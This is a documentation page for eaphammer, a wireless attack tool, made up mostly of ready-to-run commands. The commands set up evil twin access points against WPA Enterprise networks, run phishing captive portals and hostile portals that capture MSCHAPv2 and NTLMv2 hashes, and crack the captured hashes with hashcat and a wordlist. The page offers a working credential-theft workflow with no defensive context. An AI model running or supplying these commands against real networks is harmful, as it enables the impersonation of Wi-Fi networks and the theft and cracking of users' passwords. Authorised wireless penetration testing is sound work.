Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
eaphammer automates evil twin attacks against WPA Enterprise networks. It handles certificate generation, rogue AP setup, and credential capture. Also supports open network attacks via captive portals and hostile portals for NTLMv2 hash capture.
Install
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
pip3 install -r requirements.txt
Usage
python3 eaphammer [options]
Common Flags
| Flag | Description |
|---|
-i <iface> | Wireless interface |
--essid <SSID> | Target SSID to impersonate |
--auth wpa-eap | WPA Enterprise authentication |
--creds | Capture credentials |
--negotiate balanced | Try multiple EAP methods |
--cert-wizard | Interactive certificate generator |
--captive-portal | Launch phishing captive portal |
--hostile-portal | Launch Responder-based hostile portal |
Generate Certificate
python3 ./eaphammer --cert-wizard
python3 ./eaphammer --cert-wizard import \
--server-cert /path/to/server.crt \
--ca-cert /path/to/ca.crt \
--private-key /path/to/server.key \
--private-key-passwd whatever
WPA Enterprise Rogue AP
Captures MSCHAPv2 hashes from clients that don’t validate the server certificate:
python3 ./eaphammer -i wlan1 \
--auth wpa-eap \
--essid <TARGET-SSID> \
--creds \
--negotiate balanced
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
Captive Portal Attack
Phishes credentials from clients connecting to an open network:
sudo killall dnsmasq
python3 ./eaphammer --essid <OPEN-SSID> --interface wlan1 --captive-portal
Hostile Portal Attack
Serves a hostile portal that triggers automatic Windows NTLM authentication:
sudo killall dnsmasq
python3 ./eaphammer --essid <TARGET-SSID> --interface wlan1 --hostile-portal
cat logs/Responder-Session.log | grep NTLMv2 | grep Hash | awk '{print $9}' > responder.5600
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force